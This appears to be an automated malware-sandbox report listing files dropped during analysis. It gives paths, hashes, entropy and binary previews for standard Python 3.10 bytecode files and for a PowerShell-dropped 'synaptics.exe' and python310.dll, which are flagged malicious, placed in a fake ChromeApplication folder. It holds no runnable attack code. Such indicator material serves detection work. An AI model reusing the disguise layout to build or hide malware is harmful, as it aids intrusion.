                                                                                                                                                                                                  Preview:o.......:.-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\ntpath.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15335
                                                                                                                                                                                                  Entropy (8bit):5.432324131915421
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+7Lr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:yra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                  MD5:FF17D5F195205F3B13BC762D29C1322F
                                                                                                                                                                                                  SHA1:699F0B47D78779C3EDCDF4AA9DB77C9542CD5F3B
                                                                                                                                                                                                  SHA-256:FE9E962189F87334DE9394B8197FF1BDF154866910B1A26D151878C3AD6A52FC
                                                                                                                                                                                                  SHA-512:19DE5E40B0EC3007328A244204FA1E9B48B7E4538A628A3F6E71C49F0BCA7F618E0CA13D2A2A49753A7345518E45EDE1DBF52D2FF6DA533C70705339F7FBD896
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\os.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31631
                                                                                                                                                                                                  Entropy (8bit):5.451817529639715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:HZz4m1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:bbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                  MD5:8F684B0565191E2773DC8324D16A655A
                                                                                                                                                                                                  SHA1:27DA00770BD57021441C889CF8FEA1B1A092B0F3
                                                                                                                                                                                                  SHA-256:0C43E1C2DEBB84A18A6C0CBCFA81789C83D587A3A3A6208BED2D9AFC264FFFB4
                                                                                                                                                                                                  SHA-512:2007409521D20FBA48C246449D9382B99E98F7CD180D34452DE00A91D6A0A2152893580DFF23FA32E57F2B095FFAA4F02054F5D4291407F0934536520E99EA9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\site.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17412
                                                                                                                                                                                                  Entropy (8bit):5.509551124966349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zlp3Tn42l1YP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:vL42l+g7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                  MD5:1DB63D2AF229624ED67A41BF413B5058
                                                                                                                                                                                                  SHA1:BE10235DBF0A9A5386884DC2D3A0E3F2FECA9418
                                                                                                                                                                                                  SHA-256:75457647E39BDD081F98671C871C6AD061F4295179B01BB005C5C78B76BCE884
                                                                                                                                                                                                  SHA-512:875F6A64E3618BE61A3F44CB1A539B0AECE99D320D3A898E5321B535796245C9DA6F97BF98B26FFEF51A68FA2FC493291F7F2C47BB44CC2D1FCFF9BEEE4AC0B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\stat.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4305
                                                                                                                                                                                                  Entropy (8bit):5.545136817136632
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Gn/f+60wN3EXHP/aowjk0wBoCAEFXOrW6QBeABPl:GeRy3EXBwjk0w+CFXefQBT
                                                                                                                                                                                                  MD5:AB74846BBFA991F2C708E16F81C920E0
                                                                                                                                                                                                  SHA1:16825B210FC1E1F4AAFC4EB07EC5F2F5213A06CB
                                                                                                                                                                                                  SHA-256:084C9E18EBB4B9FBA2FFFFE004BD96B4C133DE89E801931C9C2D155A72D78D13
                                                                                                                                                                                                  SHA-512:1F0B285C1B93BA98A0DC8C5A2A9C5F2F1BDE2D1853BA7463DF34B6FEBE7C40BCAFABF2DFCEB3E1ECC2DB59433816B69D6E8274FA032F1D972741315643087D57
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....;C:\Users\user\AppData\Local\ChromeApplication\lib\stat.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\encodings\__pycache__\__init__.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3907
                                                                                                                                                                                                  Entropy (8bit):5.526155332237404
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:rXLHIYGspF3e06Q0YhQCUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:rXEYLpFkY/U7XYLf5c6+X1Y
                                                                                                                                                                                                  MD5:396CAECFC2CA791A2B5EB0DA3D93CE86
                                                                                                                                                                                                  SHA1:FB2339503110598F6F4C9BB51AD9076BB9F04E85
                                                                                                                                                                                                  SHA-256:15272491F9EC5941F1570B1FEEBABDCCCFA1055DAA178F07F143AFDC1BA6CC11
                                                                                                                                                                                                  SHA-512:C2E3F84EFD00534A5481D5EF0E2ABF7C564FB8950486F3319B13B730112A56D725F4C412F9DDE7DF374CBA3932BF6650903D3D8F161F3C2E169D57507F850EEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\encodings\__pycache__\aliases.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10953
                                                                                                                                                                                                  Entropy (8bit):5.844343768194318
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9X2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1imzxOkq4bpehh3qkyR0N:9XG0bueBI6wzx9IX6Ri
                                                                                                                                                                                                  MD5:746535CB26B77B4B533235C67E102D49
                                                                                                                                                                                                  SHA1:8E3BA44F4F5310B82589ABF1A850D7EF7A7070C1
                                                                                                                                                                                                  SHA-256:273E66EC43020C1F43C7CA5A17E859C0F0538945F3CD7694F8A5808BB1EE72A5
                                                                                                                                                                                                  SHA-512:B2E6E6406D76756FE232F4D99913691369D02282022FA09E09C2A8A847AAEA0373A99E2D2F10FD6BAFB72EA98DF132D877325E9CFC8FE17DA8C41C564D4CFBEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\encodings\__pycache__\cp1252.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2409
                                                                                                                                                                                                  Entropy (8bit):5.437461590795037
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:GHYqr1EY+GxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:GHY0EFWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                  MD5:60EC623C7E0567E84675B5136062BC77
                                                                                                                                                                                                  SHA1:4A47723520F81A1FD9008B68AFE82DCFCB28784F
                                                                                                                                                                                                  SHA-256:BDEECF4466CEBACDC6A8768B96F1F1FC7975B1A120933B2BDD761CC356E97D6E
                                                                                                                                                                                                  SHA-512:7DB2C7392C41BC2A78A978BAF8052EB62731A5115A1DB929256105E9C237EE4D13F15E7F5325C00E3AA907C6F452BF81F935299B082FC736B1294DC7FC4D3D72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....GC:\Users\user\AppData\Local\ChromeApplication\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\encodings\__pycache__\utf_8.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1629
                                                                                                                                                                                                  Entropy (8bit):4.7259391979319405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OVtus1pip3+HUrYPyaGcLXaLOsJkLBBn1U:ObuWxHUPNcLXaasmP1U
                                                                                                                                                                                                  MD5:5F340BC26090CE428D7C33BF7C2A22B4
                                                                                                                                                                                                  SHA1:161FE1E1CC270769C1E9511A6BD5CC3C0159D5B5
                                                                                                                                                                                                  SHA-256:BF3F799605C36D6B7EE2361D6767FB606610DB5C4951443BBDE8662B6BC743BF
                                                                                                                                                                                                  SHA-512:68EEA253A08F3F055260EC62B42C91621A97E21E247802A19B5F3320C026235A63FF5042AA9802F6BD1899D50A408DFAB9657C3EC39C0127B6CFB5B7AF17854F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....FC:\Users\user\AppData\Local\ChromeApplication\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c.................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7584
                                                                                                                                                                                                  Entropy (8bit):5.0759574908978955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WcgPE5vfnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:Oyvfnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                  MD5:80BC6511BF6C938B33047E6AD0FE61C4
                                                                                                                                                                                                  SHA1:332ADDD7542ED44D0EC3453532A8DCDFDBABE88F
                                                                                                                                                                                                  SHA-256:F9A8467A0AF35416B8C0DB601F12F0E68788DE6F02906E742F3AF3E6E1AEC7F5
                                                                                                                                                                                                  SHA-512:C6DC0F04F06B596A510992E941A1C6DFFBA33AC06167D511C96BCDFAD11C2B3B2D14224F8D9C0121A57B595BD7652473A7554810D59163B02D8CC2C8315275A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......0g.f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....]C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):531
                                                                                                                                                                                                  Entropy (8bit):5.439938513169934
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:y/ULlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBn923m/Ar4uEHx:CURtWsrPJeMS4OjyJasv6OlBQqztmm
                                                                                                                                                                                                  MD5:012D54D5370DBD4AABDAFA11FBF3E25D
                                                                                                                                                                                                  SHA1:8FD5807374D19C74304EC22D951D2F4181B896D8
                                                                                                                                                                                                  SHA-256:B8F7D7AB962794321C25328BC8379D43767CAABBE69E18A1A0C9704674B4A7D1
                                                                                                                                                                                                  SHA-512:066128367536D4438A2C3D9325E911FC982D35F42E8E69D1B14A3E0772D5DF331583C9D0FF7C5E8F8F36EE6DB86E17AE117DF556C0FF10DE0D22E3DAB45E6272
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o........h.f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....`C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\python310.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4143384
                                                                                                                                                                                                  Entropy (8bit):6.719606889163802
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:0izdDWQcAdLh1ckY/wqIEh8rvZGsIBGfHP2MZnaPxQ1w7OEnGI8wgJyf:0uAk3rWBcH+MZ0Q1wlnYZJY
                                                                                                                                                                                                  MD5:73CADAB187AD5E06BEF954190478E3AA
                                                                                                                                                                                                  SHA1:18AB7B6FE86193DF108A5A09E504230892DE453E
                                                                                                                                                                                                  SHA-256:B4893ED4890874D0466FCA49960D765DD4C2D3948A47D69584F5CC51BBBFA4C9
                                                                                                                                                                                                  SHA-512:B2EBE575F3252FF7ABEBAB23FC0572FC8586E80D902D5A731FB7BD030FAA47D124240012E92FFE41A841FA2A65C7FB110AF7FB9AB6E430395A80E925283E2D4D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...............p.......jf......p.......p.......p.......}.......}...............p.......p.......pd......p......Rich............PE..L.....,d...........!......$...........$.......$...............................B......3@...@..........................%:.......:.|.....?...............?../....?.l1..(.9.T.............................9.@.............$..............................text.....$.......$................. ..`.rdata...F....$..H....$.............@..@.data.........;.......:.............@...PyRuntimh.....?.......<.............@....rsrc.........?.......<.............@..@.reloc..l1....?..2....<.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100120
                                                                                                                                                                                                  Entropy (8bit):6.420724895344148
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:93b37AhIxHHWMpdPa5wiE21M8kJIGFvb1Cwv/O5sX7Sy1Px0e:977ASwMpdCq/IM8uIGf1/O5sXzx0e
                                                                                                                                                                                                  MD5:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                  SHA1:69535B162FF00A1454BA62D6FABA549B966D937F
                                                                                                                                                                                                  SHA-256:FF507B25AF4B3E43BE7E351EC12B483FE46BDBC5656BAAE6AD0490C20B56E730
                                                                                                                                                                                                  SHA-512:6D8042A6C8E72F76B2796B6A33978861ABA2CFD8B3F8DE2088BBFF7EA76D91834C86FA230F16C1FDDAE3BF52B101C61CB19EA8D30C6668408D86B2003ABD0967
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.)./.G./.G./.G.&...%.G.}.F.-.G.}.B.<.G.}.C.#.G.}.D...G...F.,.G.d.F.-.G./.F...G...O...G......G...E...G.Rich/.G.................PE..L.....,d.....................H......n........ ....@.................................p.....@.................................l%.......@..x5...........X.../......\....!..T...........................X!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x5...@...6... ..............@..@.reloc..\............V..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\vcruntime140.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76168
                                                                                                                                                                                                  Entropy (8bit):6.765544990184352
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                                                                                  MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                                                                                  SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                                                                                  SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                                                                                  SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                                                                                  Malicious:false
